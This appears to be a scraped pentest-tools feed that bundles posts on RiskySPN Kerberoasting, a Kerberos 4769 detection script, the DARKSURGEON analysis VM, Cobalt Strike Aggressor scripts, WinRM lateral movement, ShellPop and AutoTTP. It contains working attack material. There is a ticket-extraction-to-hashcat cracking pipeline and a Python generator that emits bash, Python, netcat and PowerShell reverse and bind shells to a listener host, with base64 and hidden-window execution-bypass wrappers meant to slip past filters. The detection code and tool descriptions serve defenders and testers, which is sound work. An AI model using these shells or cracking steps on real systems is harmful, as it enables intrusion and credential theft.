RiskySPN – Detect And Abuse Risky SPNs

RiskySPNs is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Names). The module can assist blue teams in identifying potentially risky SPNs, and red teams in escalating privileges by leveraging Kerberos and Active Directory.

For detailed information: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/

Usage

Install the module:
  Import-Module .\RiskySPNs.psm1
Or just dot-source the script (you can also IEX it from the web):
  . .\Find-PotentiallyCrackableAccounts.ps1
Make sure Set-ExecutionPolicy is Unrestricted or Bypass.

Get information about a function (very detailed :)):
  Get-Help Get-TGSCipher -Full
All functions also have a -Verbose mode.

Search for vulnerable SPNs

Find vulnerable accounts:
  Find-PotentiallyCrackableAccounts
Sensitive + RC4 = $$$ (a privileged account whose service ticket the KDC will still encrypt with RC4-HMAC is the best-case target: RC4 tickets crack orders of magnitude faster than AES ones).

Generate a full, detailed report about vulnerable accounts (CISO <3):
  Export-PotentiallyCrackableAccounts

Get tickets

Request a Kerberos TGS for an SPN:
  Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
Or:
  Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

The fun stuff :)
  Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
  oclHashcat64.exe -m 13100 crack.txt -a 3
Mode 13100 is hashcat's Kerberos 5 TGS-REP etype 23 (RC4-HMAC) mode, so it only applies to RC4 tickets; -a 3 is a mask (brute-force) attack, and a wordlist-plus-rules run (-a 0) is the usual first pass against service-account passwords.

Download RiskySPN
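
The triage that Find-PotentiallyCrackableAccounts performs, written out as an added example (this is not RiskySPNs code). It scores accounts the way the "Sensitive + RC4" heuristic above does, from constructed AD-style records instead of a live LDAP query; the sensitive group list, the scoring weights and the one-year password-age cutoff are assumptions for illustration. An absent or zero msDS-SupportedEncryptionTypes attribute is treated as "RC4 obtainable", which is how the KDC behaves for accounts that were never restricted to AES.

```python
"""Rank accounts carrying an SPN by how attractive they are to Kerberoast
(or, for the defender, how urgently they need fixing).

Added example, not part of RiskySPNs. Works on constructed AD-style records;
the sensitive groups and the scoring weights are assumptions.
"""
from datetime import datetime, timedelta, timezone

# msDS-SupportedEncryptionTypes bit flags
RC4_HMAC = 0x4
AES128_CTS_HMAC_SHA1_96 = 0x8
AES256_CTS_HMAC_SHA1_96 = 0x10
# userAccountControl flag
ACCOUNTDISABLE = 0x2
# Groups treated as "sensitive" (assumed list for the example)
SENSITIVE_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Account Operators"}


def rc4_allowed(enc_types):
    """True if the KDC may issue an RC4-HMAC (etype 23) service ticket for the
    account. Absent or zero means 'no restriction', i.e. RC4 is on the table."""
    return not enc_types or bool(enc_types & RC4_HMAC)


def assess(account, now):
    """None if the account is not a crackable target, else reasons and a score."""
    sam = account["sAMAccountName"]
    if account.get("objectClass") == "computer" or sam.lower() == "krbtgt":
        return None  # machine passwords are random and rotated; krbtgt is not roastable this way
    if not account.get("servicePrincipalName"):
        return None  # nothing to request a TGS for
    if account.get("userAccountControl", 0) & ACCOUNTDISABLE:
        return None  # the KDC will not issue tickets for a disabled account

    reasons, score = [], 1  # 1: user account with SPN, any domain user can request its ticket
    if rc4_allowed(account.get("msDS-SupportedEncryptionTypes")):
        reasons.append("RC4 ticket obtainable (hashcat -m 13100)")
        score += 2
    else:
        reasons.append("AES-only ticket (hashcat -m 19600/19700, much slower)")
    privileged = set(account.get("memberOf", ())) & SENSITIVE_GROUPS
    if privileged or account.get("adminCount") == 1:
        reasons.append("sensitive: " + (", ".join(sorted(privileged)) or "adminCount=1"))
        score += 3
    age = now - account["pwdLastSet"]
    if age > timedelta(days=365):  # assumed cutoff; old service passwords are rarely strong
        reasons.append(f"password last set {age.days} days ago")
        score += 1
    return {"sAMAccountName": sam, "spns": list(account["servicePrincipalName"]),
            "score": score, "reasons": reasons}


def find_potentially_crackable(accounts, now, sensitive_only=False):
    """Mirror of the -Sensitive switch: optionally keep only privileged hits."""
    hits = [h for h in (assess(a, now) for a in accounts) if h]
    if sensitive_only:
        hits = [h for h in hits if any(r.startswith("sensitive") for r in h["reasons"])]
    return sorted(hits, key=lambda h: h["score"], reverse=True)


NOW = datetime(2018, 6, 15, tzinfo=timezone.utc)


def _acct(sam, spns, pwd_set, object_class="user", uac=0x200, enc=None, groups=(), admin_count=0):
    return {"sAMAccountName": sam, "objectClass": object_class, "servicePrincipalName": spns,
            "userAccountControl": uac, "msDS-SupportedEncryptionTypes": enc,
            "memberOf": list(groups), "adminCount": admin_count,
            "pwdLastSet": datetime(*pwd_set, tzinfo=timezone.utc)}


# Constructed directory records (hypothetical domain)
SAMPLE_ACCOUNTS = [
    _acct("svc_sql", ["MSSQLSvc/prodDB.company.com:1433"], (2015, 1, 10),
          groups=["Domain Admins"], admin_count=1),             # RC4 default, privileged, stale
    _acct("svc_web", ["HTTP/intranet.company.com"], (2018, 5, 1), enc=0x18),  # AES only
    _acct("svc_legacy", ["HTTP/old.company.com"], (2012, 3, 3), uac=0x202),   # disabled
    _acct("WS01$", ["HOST/WS01.company.com"], (2018, 6, 1), object_class="computer"),
    _acct("krbtgt", ["kadmin/changepw"], (2010, 1, 1)),
]

if __name__ == "__main__":
    for hit in find_potentially_crackable(SAMPLE_ACCOUNTS, NOW):
        print(f"{hit['score']}  {hit['sAMAccountName']:12} {'; '.join(hit['reasons'])}")
```

On a real domain the same fields come from an LDAP query for (&(objectClass=user)(servicePrincipalName=*)); the ordering the function produces is exactly what the -Sensitive and RC4 checks above are optimising for.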

Link: http://feedproxy.google.com/~r/PentestTools/~3/Zc66zkwABNE/riskyspn-detect-and-abuse-risky-spns.html

Kerberoast

Kerberoast is the process of requesting Kerberos service tickets (TGS) for accounts that have SPNs, exporting them and cracking them offline to recover the service account's password, which then gives access to the targeted service. It is a very common attack in red team engagements since it doesn't require any interaction with the service: legitimate Active Directory access can be used to request and export the service ticket […]
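
The defender's side of the same technique, as an added example that is not from the pentestlab post: detection logic over Windows Security event 4769 ("A Kerberos service ticket was requested"). The events below are constructed records using the 4769 field names a SIEM would hand you; the five-minute window and the three-service threshold are assumptions to tune per environment. It keys on what a roast looks like at the KDC: one account pulling RC4 (TicketEncryptionType 0x17) tickets for several user-owned SPNs in quick succession, while ignoring computer accounts, krbtgt and requests that failed.

```python
"""Detect Kerberoasting in Security event 4769.

Added example, not code from the post. Events are constructed; the window
and threshold are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"       # TicketEncryptionType for etype 23, what hashcat 13100 cracks
TICKET_ISSUED = "0x0"   # Status KDC_ERR_NONE: a ticket was actually handed out


def is_roast_candidate(ev):
    """A single 4769 that matters: a successfully issued RC4 service ticket for
    an SPN owned by a user account. Computer accounts (ServiceName ending in
    '$') and krbtgt are skipped: their keys are random and not worth cracking."""
    svc = ev["ServiceName"].lower()
    if svc.endswith("$") or svc == "krbtgt":
        return False
    return ev["Status"] == TICKET_ISSUED and ev["TicketEncryptionType"] == RC4_HMAC


def detect(events, window=timedelta(minutes=5), min_services=3):
    """One alert per requesting account that pulled RC4 tickets for at least
    min_services distinct user-owned SPNs inside window. In 4769 the requester
    is TargetUserName, not ServiceName."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if is_roast_candidate(ev):
            by_user[ev["TargetUserName"]].append(ev)

    alerts = []
    for user, evs in by_user.items():
        start = 0
        for end, ev in enumerate(evs):
            while ev["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1  # slide the window start forward until it fits
            in_window = evs[start:end + 1]
            services = sorted({e["ServiceName"] for e in in_window})
            if len(services) >= min_services:
                alerts.append({"user": user, "source": ev["IpAddress"],
                               "first": in_window[0]["TimeCreated"], "last": ev["TimeCreated"],
                               "services": services})
                break  # one alert per account per run is enough
    return alerts


def rc4_tickets_for_user_spns(events):
    """Lower-fidelity signal: every RC4 ticket for a user-owned SPN. On a domain
    whose service accounts are AES-only this list should be empty, so any entry
    deserves a look even without a burst."""
    return [ev for ev in events if is_roast_candidate(ev)]


T0 = datetime(2018, 6, 12, 9, 0, 0)


def _ev(offset_s, user, service, etype, status="0x0", ip="::ffff:10.0.0.23"):
    return {"TimeCreated": T0 + timedelta(seconds=offset_s), "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype, "Status": status,
            "IpAddress": ip}


# Constructed sample: one account roasting three services in a few seconds,
# plus the benign noise a real log carries.
SAMPLE_EVENTS = [
    _ev(0, "jdoe@CORP.LOCAL", "svc_sql", "0x17"),
    _ev(1, "jdoe@CORP.LOCAL", "svc_web", "0x17"),
    _ev(2, "jdoe@CORP.LOCAL", "svc_backup", "0x17"),
    _ev(3, "jdoe@CORP.LOCAL", "WS01$", "0x17"),                               # computer account, ignored
    _ev(4, "jdoe@CORP.LOCAL", "krbtgt", "0x12"),                               # TGT renewal, ignored
    _ev(600, "alice@CORP.LOCAL", "svc_sql", "0x12", ip="::ffff:10.0.0.40"),   # AES ticket, normal use
    _ev(660, "bob@CORP.LOCAL", "svc_web", "0x17", ip="::ffff:10.0.0.41"),     # one RC4 ticket, legacy client
    _ev(720, "mallory@CORP.LOCAL", "svc_sql", "0x17", status="0x7"),          # no ticket issued
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['user']} from {a['source']} requested RC4 tickets for {', '.join(a['services'])}")
```

The burst rule catches the "pipe every SPN into Get-TGSCipher" workflow; a patient attacker requesting one ticket an hour only shows up in the lower-fidelity list, which is why moving service accounts to AES-only (so 0x17 never appears for them) is the control that makes the log signal unambiguous.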

Link: https://pentestlab.blog/2018/06/12/kerberoast/

DARKSURGEON – A Windows Packer Project To Empower Incident Response, Digital Forensics, Malware Analysis, And Network Defense

DARKSURGEON is a Windows Packer project to empower incident response, digital forensics, malware analysis, and network defense.

DARKSURGEON has three stated goals:
- Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities.
- Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant.
- Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10.

If you haven't worked with Packer before, this project has a simple premise: provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys.

Please note this is an alpha project and it will be subject to continual development, updates, and package breakage.

Development Principles

DARKSURGEON is based on a few key development principles:
- Modularity is key. Each component of the installation and configuration process should be modular. This allows individuals to tailor their Packer image in the most flexible way.
- Builds must be atomic. A Packer build should either complete all configuration and installation tasks without errors, or it should fail. A Packer image with missing tools is a failure scenario.
- Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on DARKSURGEON security can be found later in this post.
- Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration.
- Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection.

Hardening

DARKSURGEON is hardened out of the box, and comes with scripts to enable High or Low security modes.

All default installations of DARKSURGEON have the following security features enabled:
- Windows Secure Boot is enabled.
- Windows Event Log auditing is enabled. (Palantir Windows Event Forwarding Guidance)
- Windows PowerShell auditing is enabled. (Palantir Windows Event Forwarding Guidance)
- Windows 10 privacy and telemetry are reduced to minimal settings. (Microsoft Guidance)
- Sysinternals Sysmon is installed and configured. (SwiftOnSecurity public ruleset)
- LLMNR is disabled.
- NBT is disabled.
- WPAD is removed.
- PowerShell v2 is removed.
- SMB v1 is removed.
- Application handlers for commonly-abused file extensions are changed to notepad.exe.

Additionally, the user may specify a Low or High security mode by using the appropriate scripts. The default setting is to build an image in Low Security mode.

Low Security mode is primarily used for virtual machines intended for reverse engineering, malware analysis, or systems that cannot support VBS security controls. In Low Security mode, the following hardening features are configured:
- Windows Defender Anti-Virus real-time scanning is disabled.
- Windows Defender SmartScreen is disabled.
- Windows Defender Credential Guard is disabled.
- Windows Defender Exploit Guard is disabled.
- Windows Defender Exploit Guard Attack Surface Reduction (ASR) is disabled.
- Windows Defender Application Guard is disabled.
- Windows Defender Application Guard does not enforce isolation.

Note: High Security mode is still in development.

High Security mode is primarily used for production deployment of sensitive systems (e.g. Privileged Access Workstations) and may require additional tailoring or configuration. In High Security mode, the following hardening features are configured:
- Windows Defender Anti-Virus real-time scanning is enabled.
- Windows Defender SmartScreen is enabled and applied to all traffic.
- Windows Defender Credential Guard is enabled.
- Windows Defender Exploit Guard is enabled.
- Windows Defender Exploit Guard Attack Surface Reduction (ASR) is enabled.
- Windows Defender Application Guard is enabled.
- Windows Defender Application Guard enforces isolation.

Telemetry

Whether analyzing unknown binaries or working on sensitive projects, endpoint telemetry powers detection and response operations. DARKSURGEON comes pre-configured with the following telemetry sources available for analysis:
- Windows Event Log auditing is enabled. (Palantir Windows Event Forwarding Guidance)
- Windows PowerShell auditing is enabled. (Palantir Windows Event Forwarding Guidance)
- Sysinternals Sysmon is installed and configured. (SwiftOnSecurity ruleset)

Privacy

Your operational environment contains some of the most sensitive data from your network, and it's important to safeguard it from prying eyes. DARKSURGEON implements the following strategies to maximize privacy without hindering workflows:
- Windows 10 telemetry settings are configured to minimize collection.
- Cortana, diagnostics, tracking, and other services are disabled.
- Windows Error Reporting (WER) is disabled.
- Windows Timeline, shared clipboard, device hand-off, and other synchronize-by-default applications are disabled or neutered.
- Microsoft Guidance for reducing telemetry and data collection has been implemented.

Packages

Out of the box, DARKSURGEON comes equipped with tools, scripts, and binaries to make your life as a defender easier.

Android Analysis (tools, scripts, and binaries focused on Android analysis and reverse engineering): APKTool (FLARE)

Blue Team (tools, scripts, and binaries focused on blue team, network defense, and alerting/detection development): ACE, Bloodhound / Sharphound, CimSweep, Dumpsterfire, EndGame Red Team Automation (RTA), Kansa, Posh-Git, Invoke-ATTACKAPI, LOLBAS (Living Off the Land Binaries And Scripts), OSX Collector, Posh-SecMod, Posh-Sysmon, PowerForensics, PowerSploit, Practical Malware Analysis Labs (FLARE), Revoke-Obfuscation, Yara (FLARE)

Debuggers (tools, scripts, and binaries for debugging binary artifacts): Ollydbg (FLARE), OllyDump (FLARE), OllyDumpEx (FLARE), Ollydbg2 (FLARE), OllyDump2Ex (FLARE), x64dbg (FLARE), Windbg (FLARE)

Disassemblers (tools, scripts, and binaries for disassembling binary artifacts): IDA Free Trial (FLARE), Binary Ninja Demo (FLARE), Radare2 (FLARE)

Document Analysis (tools, scripts, and binaries for performing analysis of documents): OffVis (FLARE), OfficeMalScanner (FLARE), PDFId (FLARE), PDFParser (FLARE), PDFStreamDumper (FLARE)

DotNet Analysis (tools, scripts, and binaries for performing analysis of DotNet artifacts): DE4Dot (FLARE), DNSpy (FLARE), DotPeek (FLARE), ILSpy (FLARE)

Flash Analysis (tools, scripts, and binaries for performing analysis of Flash artifacts): FFDec (FLARE)

Forensic Analysis (tools, scripts, and binaries for performing forensic analysis on application and operating system artifacts): Amcache Parser, AppCompatCache Parser, IISGeolocate, JLECmd, LECmd, JumpList Explorer, PECmd, Registry Explorer, Regshot (FLARE), Shellbags Explorer, Timeline Explorer, TSK (The Sleuthkit), Volatility, X-Ways Forensics Installer Manager (XWFIM)

Hex Editors: FileInsight (FLARE), HxD (FLARE), 010 Editor (FLARE)

Java Analysis: JD-GUI (FLARE), Dex2JAR

Network Analysis: Burp Free, FakeNet-NG (FLARE), Wireshark (FLARE)

PE Analysis: DIE (FLARE), EXEInfoPE (FLARE), Malware Analysis Pack (MAP) (FLARE), PEiD (FLARE), ExplorerSuite (CFF Explorer) (FLARE), PEStudio (FLARE), PEview (FLARE), Resource Hacker (FLARE), VirusTotal Uploader

PowerShell Modules: Active Directory, Azure Management, Pester

Python Libraries: Cryptography, Hexdump, OLETools, LXML, Pandas, Passivetotal, PEFile, PyCryptodome, Scapy, Shodan, Sigma, Visual C++ for Python, Vivisect, WinAppDBG, Yara-Python

Red Team: Grouper, Inveigh, Nmap, PowerShell Empire, PowerupSQL, PSAttack, PSAttack Build Tool, Responder

Remote Management: AWS Command Line (AWSCLI), OpenSSH, Putty, Remote Server Administration Tools (RSAT)

Utilities: 1Password, 7Zip, Adobe Flash Player, Adobe Reader, API Monitor, Bleachbit, Boxstarter, Bstrings, Checksum, Chocolatey, Cmder, Containers (Hyper-V), Curl, Cyber Chef, Docker, DotNet 3.5, DotNet 4, Exiftool, FLOSS (FLARE), Git, GoLang, Google Chrome, GPG4Win, Hashcalc, Hashdeep, Hasher, Hashtab, Hyper-V, Irfanview, Java JDK8, Java JRE8, JQ, Jupyter, Keepass, Microsoft Edge, Mozilla Firefox, Mozilla Thunderbird, Neo4j Community, NodeJS, Nuget, Office365 ProPlus, OpenVPN, Osquery, Python 2.7, Qbittorrent, RawCap, Slack, Sublime Text 3, Sysinternals Suite, Tor Browser, UnixUtils, UPX, Visual C++ 2005, Visual C++ 2008, Visual C++ 2010, Visual C++ 2012, Visual C++ 2013, Visual C++ 2015, Visual C++ 2017, Visual Studio Code, Windows 10 SDK, Windows Subsystem for Linux (WSL), Winlogbeat, XorSearch, XorStrings

Visual Basic Analysis: VBDecompiler

Building DARKSURGEON

Build process

DARKSURGEON is built using the HashiCorp application Packer. The total build time for a new instance of DARKSURGEON is around 2–3 hours.
- Packer creates a new virtual machine using the DARKSURGEON JSON file and your hypervisor of choice (e.g. Hyper-V, VirtualBox, VMware).
- The answers.iso file is mounted inside the DARKSURGEON VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of Windows, as well as a PowerShell script to configure Windows Remote Management (WinRM).
- Packer connects to the DARKSURGEON VM using WinRM and copies all files in the helper-scripts and configuration-files directories over to the guest.
- Packer performs serial installations of each of the configured PowerShell scripts, performing occasional reboots as needed.
- When complete, Packer performs a sysprep, shuts down the virtual machine, and creates a Vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file.

Setup

Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMware support are forthcoming.
1. Install Packer, Vagrant, and your preferred hypervisor on your host.
2. Download the repository contents to your host.
3. Download a Windows 10 Enterprise Evaluation ISO (1803).
4. Move the ISO file to your local DARKSURGEON repository.
5. Update DARKSURGEON.json with the ISO SHA1 hash and file name.
6. (Optional) Execute the PowerShell script New-DARKSURGEONISO.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository, but you may re-build it if you don't trust it or would like to modify the unattend files:
   powershell.exe New-DARKSURGEONISO.ps1
7. Build the recipe using Packer:
   packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.json

Configuring DARKSURGEON

DARKSURGEON is designed to be modular and easy to configure. An example configuration is provided in the DARKSURGEON.json file, but you may add, remove, or tweak any of the underlying scripts.

Have a custom CA you need to add? Need to add a license file for IDA? No problem. You can throw any files you need in the configuration-files directory and they'll be copied over to the guest for you.

Want to install a custom package, or need some specific OS tweaks? No worries. Simply make a new PowerShell script (or modify an existing one) in the configuration-scripts directory and add it as a build step in the Packer JSON file.

Using DARKSURGEON

Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMware support are forthcoming.

Once DARKSURGEON has successfully built, you'll receive an output Vagrant box file. The box file contains the virtual machine image and Vagrant metadata, allowing you to quickly spin up a virtual machine as needed.
1. Install Vagrant and your preferred hypervisor on your host.
2. Navigate to the DARKSURGEON repository (or the location where you've saved the DARKSURGEON box file).
3. Perform a vagrant up:
   vagrant up

Vagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one? Easy, just perform the following:
   vagrant destroy && vagrant up

Once the DARKSURGEON virtual machine is running, you can log in using one of the two local accounts.

Note: these are default accounts with default credentials, and the image has WinRM enabled for the build. Change the credentials in your Packer build before exposing the VM to any network you do not fully control.

Administrator account: username Darksurgeon, password darksurgeon
Local user account: username Unprivileged, password unprivileged

If you'd rather not use Vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by Packer.

Downloading DARKSURGEON

If you'd rather skip the process of building DARKSURGEON and want to trust the box file I've built, you can simply download it here.

Contributing

Contributions, fixes, and improvements can be submitted directly against this project as a GitHub issue or pull request. Tools will be reviewed and added on a case-by-case basis.

Frequently Asked Questions

Why is Hyper-V the preferred hypervisor?
I strongly believe in the value of Windows Defender Device Guard and Virtualization Based Security, which require the usage of Hyper-V for optimal effectiveness. As a result, other hypervisors are not recommended on the host machine. I will do my best to accommodate other mainline hypervisors, but I would encourage all users to try using Hyper-V.

Why does the entire Packer build fail on a Chocolatey package error?
This was a design decision made to guarantee that all packages which were expected made it into the final Packer build. The upside of this decision is that it guarantees all expected tools will be available in the finalized product. The downside is that additional complexity and fragility are inserted into the build pipeline, as transient or Chocolatey errors may cause a build to fail. If you wish to ignore this functionality, you are free to modify the underlying script to ignore errors on package installation.

Does this project support using a Chocolatey Professional/Business/Consultant license?
Yes. If you add your license file (named chocolatey.license.xml) to the configuration-files directory when performing a Packer build, it will automatically be imported by the Set-ChocolateySettings.ps1 script. Please ensure that your usage of a Chocolatey license adheres to their End-User License Agreement.

Why are the build functions broken into dozens of individual PowerShell scripts?
Flexibility is key. You may opt to use, or not use, any of these scripts, and in any order. Having individual files, while increasing project complexity, ensures that the project can be completely customized without issue.

I want to debug the build. How do I do so?
Add the Set-Breakpoint.ps1 script into the provisioner process at the desired point. This will cause the Packer build to halt for 4 hours as it waits for the script to complete.

Troubleshooting

The Packer build process never starts and hangs on the UEFI screen.
This is most likely a timing issue caused by the emulated key presses not causing the image to boot from the mounted Windows ISO. Restart your VM and hit any key a few times until the build process starts.

Packer timed out during the build. I didn't receive an error.
Due to the size of the packages that are downloaded and installed, you may have exceeded the default Packer build time limit.

My VM is running, but Packer doesn't seem to connect via WinRM.
Connect to the guest and check the following:
- WinRM is accessible from your Packer host. (Test-NetConnection -ComputerName -Port 5985)
- WinRM is allowed on the guest firewall.

I keep getting anti-virus, checksum, or other issues with Chocolatey. What gives?
Unfortunately these packages can be a moving target. New updates can render the static checksum in the Chocolatey package incorrect, anti-virus may mistakenly flag binaries, etc. Global Chocolatey options can be specified to prevent these errors from occurring, but I will do my best to respond to bug reports filed as issues on underlying Chocolatey packages.

Download DARKSURGEON

Link: http://feedproxy.google.com/~r/PentestTools/~3/B8p_3LOKtq0/darksurgeon-windows-packer-project-to.html

AggressorScripts – Collection Of Aggressor Scripts For Cobalt Strike 3.0+ Pulled From Multiple Sources

Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources:

All_In_One.cna v1 – Removed and outdated. All-purpose script to enhance the user's experience with Cobalt Strike: custom menu creation, logging, persistence, enumeration, and 3rd-party script integration. Version 2 is currently in development!

ArtifactPayloadGenerator.cna – Generates every type of stageless/staged payload based off an HTTP/HTTPS listener. Creates /opt/cobaltstrike/Staged_Payloads and /opt/cobaltstrike/Stageless_Payloads.

AVQuery.cna – Queries the registry with PowerShell for all AV installed on the target. Quick and easy way to get the AV you are dealing with as an attacker.

CertUtilWebDelivery.cna – Stageless web delivery using CertUtil.exe. Powerpick is used to spawn certutil.exe to download the stageless payload on the target and execute it with rundll32.exe.

RedTeamRepo.cna – A common collection of OS commands and Red Team tips for when you have no Google or RTFM on hand. The script will be updated on occasion; feedback and more input are welcome!

ProcessColor.cna – Color-coded process listing without the file requirement. Thanks to @oldb00t for the original version: https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight

Download AggressorScripts

Link: http://feedproxy.google.com/~r/PentestTools/~3/eyZ3X6y8WgA/aggressorscripts-collection-of.html

Lateral Movement – WinRM

WinRM stands for Windows Remote Management and is a service that allows administrators to perform management tasks on systems remotely. Communication is SOAP over HTTP (port 5985) or HTTPS (port 5986); Kerberos and NTLM authentication are supported by default, and Basic authentication can be enabled. Using the service requires administrator-level credentials (or membership in the Remote Management Users group). In a red team scenario if […]

Link: https://pentestlab.blog/2018/05/15/lateral-movement-winrm/

ShellPop – Pop Shells Like A Master

Pop shells like a master. ShellPop is all about popping shells. With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests. Don't waste more time with .txt files storing your reverse shells!

Installation

Python 2.x is required; 3.0+ will not work.

Required dependencies:
  root@kali# apt-get install python-argcomplete -y
  root@kali# pip install -r requirements.txt

Setup install:
  root@kali# python setup.py install

PS: after installation, tab auto-complete will only work after restarting the terminal.

Help section

To quickly list all available options of this tool, use --help:
  root@kali# shellpop --help

Shells list

You can list all available ShellPop shells using the --list option:
  root@kali# shellpop --list

Download ShellPop
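
What a generator like ShellPop does under the hood, as an added example written for this page (it is not ShellPop's own code). It builds a few reverse and bind shell one-liners from a listener host and port, refuses inputs that would break the command's quoting, and wraps the result in base64 so it survives copy-paste and naive filters. The base64 wrappers and input checks are assumptions about what such a tool should offer; one detail it gets right that hand-rolled payloads often miss is that PowerShell's -EncodedCommand takes base64 of UTF-16LE, not UTF-8.

```python
"""Reverse and bind shell one-liner generator in the spirit of ShellPop.

Added example, not ShellPop's own code. LHOST/LPORT are whatever you pass in;
the encoders and the input checks are assumptions for this example.
"""
import base64


def _check(host, port):
    """Refuse values that would break the quoting of the generated command."""
    port = int(port)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    if not host or any(ch in host for ch in " '\"$`;|&"):
        raise ValueError(f"unsafe characters in host: {host!r}")
    return host, port


def bash_reverse(host, port):
    host, port = _check(host, port)
    # /dev/tcp is a bash feature; wrapping in bash -c makes it work from sh too
    return f"bash -c 'bash -i >& /dev/tcp/{host}/{port} 0>&1'"


def python_reverse(host, port):
    host, port = _check(host, port)
    return ("python -c 'import socket,subprocess,os;s=socket.socket();"
            f"s.connect((\"{host}\",{port}));"
            "[os.dup2(s.fileno(),f) for f in (0,1,2)];"
            "subprocess.call([\"/bin/sh\",\"-i\"])'")


def nc_bind(port):
    _, port = _check("x", port)
    # mkfifo form works with netcat builds that lack -e
    return f"rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l -p {port} > /tmp/f"


def powershell_reverse(host, port):
    host, port = _check(host, port)
    return (f'$c=New-Object Net.Sockets.TCPClient("{host}",{port});$s=$c.GetStream();'
            '[byte[]]$b=New-Object byte[] 65536;'
            'while(($i=$s.Read($b,0,$b.Length)) -ne 0){'
            '$d=[Text.Encoding]::ASCII.GetString($b,0,$i);'
            '$o=(iex $d 2>&1|Out-String)+"PS> ";'
            '$w=[Text.Encoding]::ASCII.GetBytes($o);$s.Write($w,0,$w.Length);$s.Flush()};'
            '$c.Close()')


def encode_sh(cmd):
    """Base64 on the wire, decoded on the target: sidesteps quoting problems and
    naive keyword filters. It is not obfuscation against anyone who decodes."""
    return "echo " + base64.b64encode(cmd.encode()).decode() + " | base64 -d | bash"


def decode_sh(cmdline):
    """Inverse of encode_sh."""
    return base64.b64decode(cmdline.split()[1]).decode()


def encode_powershell(script):
    """-EncodedCommand takes base64 of UTF-16LE, not UTF-8. Using the wrong
    charset is the usual reason an encoded payload silently does nothing."""
    b64 = base64.b64encode(script.encode("utf-16le")).decode()
    return f"powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand {b64}"


def decode_powershell(cmdline):
    """Inverse of encode_powershell; also handy when triaging a suspicious command line."""
    return base64.b64decode(cmdline.split("-EncodedCommand ", 1)[1]).decode("utf-16le")


if __name__ == "__main__":
    # Placeholder listener for the demo
    print(bash_reverse("10.10.14.5", 4444))
    print(encode_sh(bash_reverse("10.10.14.5", 4444)))
    print(encode_powershell(powershell_reverse("10.10.14.5", 4444)))
```

The decode helpers are there on purpose: the same UTF-16LE detail matters on the blue side when you pull an -EncodedCommand out of a 4688 or Sysmon process-creation event and need to see what it actually ran.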

Link: http://feedproxy.google.com/~r/PentestTools/~3/peg6gTlgbIg/shellpop-pop-shells-like-master.html

AutoTTP – Automated Tactics Techniques & Procedures

Automated Tactics, Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generating data for researchers and so on can be tedious. I toyed with the idea of making it easier to script Empire (or any framework/product/toolkit that provides an API, such as Metasploit (RPC), Cobalt Strike and so on) using an IDE like Visual Studio Code (or equivalent). So I started to design AutoTTP. This is still very much a work in progress. Please use Empire 2.2.

What is a TTP?

The tactics are organized as per my Attack Life Cycle model. There are other models, like Lockheed Martin's Kill Chain(R), the Mandiant Attack Life Cycle and MITRE's ATT&CK. Whichever model it may be, a "Tactic" essentially groups techniques together; e.g. code-execution/run-payload can be achieved in many ways.

"Stage" has been used to group relevant "Tactics" together. If you look into the source tree, the folder structure reflects the matrix's Tactics column. The matrix also lists the respective controls for each offensive tactic.

How did these stages come about?

The Venn diagram in the middle of the red cycle is from Dartmouth College's "Three Tenets for Secure Cyber-Physical System Design and Assessment". It defines the necessary and sufficient conditions, or simply the requirements, of any successful physical/logical attack. I added the red ring (stages) around the Venn diagram to illustrate typical offensive flows which ultimately lead to impact on information confidentiality, integrity and system availability, or safety if it is related to cyber-physical systems (think Critical Information Infrastructure).

An attacker can start from Stage 1 and get straight into Stage 4, e.g. default admin credentials on a publicly exposed admin page. It does not need to be linear (stage 1->2->3->4). After the initial infiltration, s/he could have performed some internal information gathering (recon) first before escalating privilege on the first machine and then launching a remote command to another target machine within the same network. For the next victim machine, it is Stage 2: successful payload delivery and execution, which allows the attacker to gain command and control over yet another machine.

Download AutoTTP

Link: http://feedproxy.google.com/~r/PentestTools/~3/FlsKk102ZOA/autottp-automated-tactics-techniques.html